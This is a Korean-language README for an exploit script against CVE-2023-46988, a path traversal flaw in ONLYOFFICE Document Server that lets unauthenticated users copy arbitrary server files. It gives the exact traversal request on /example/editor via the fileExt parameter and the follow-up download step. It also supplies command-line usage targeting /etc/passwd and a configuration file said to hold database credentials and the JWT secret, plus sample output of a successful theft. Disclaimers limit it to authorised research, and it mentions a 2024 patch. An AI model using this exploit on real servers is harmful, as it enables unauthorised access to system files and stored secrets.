
CVE-2023-46988: ONLYOFFICE 경로 탐색 익스플로잇
이 스크립트는 ONLYOFFICE Document Server의 경로 탐색(Path Traversal) 취약점(CVE-2023-46988)을 악용하여, 인증되지 않은 사용자가 서버에서 임의의 파일을 복사할 수 있게 합니다. 이 취약점은 /example/editor 엔드포인트에 존재하며, fileExt 매개변수를 조작하여 민감한 시스템 및 구성 파일에 접근할 수 있습니다.
이 도구는 교육 및 승인된 보안 연구 목적으로만 사용됩니다.
명시적 허가 없이 시스템에 무단으로 사용하는 것은 불법이며 비윤리적입니다.
/etc/passwd/etc/onlyoffice/documentserver/local.json (데이터베이스 자격 증명 및 JWT 비밀 키 포함)--file 인수로 검색할 모든 파일 경로 지정 가능.--proxy).--verify).python onlyoffice_exploit.py http://localhost
다음 파일을 검색합니다:
/etc/passwd/etc/onlyoffice/documentserver/local.json/etc/hosts)python onlyoffice_exploit.py http://localhost --file /etc/hosts
127.0.0.1:8080의 Burp Suite)python onlyoffice_exploit.py http://localhost --proxy
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
python onlyoffice_exploit.py https://example.local --verify
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
fileExt 매개변수를 사용하여 /example/editor에 요청을 전송합니다:
GET /example/editor?fileExt=../../../../../../../../etc/passwd
/example/download?fileName=<extracted_filename>에서 파일을 다운로드합니다.[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd
ONLYOFFICE는 2024년 2월 업데이트에서 이 취약점을 패치했습니다.
사용자는 서버를 보호하기 위해 최신 버전으로 업데이트해야 합니다.
이 프로젝트는 MIT 라이선스로 배포됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.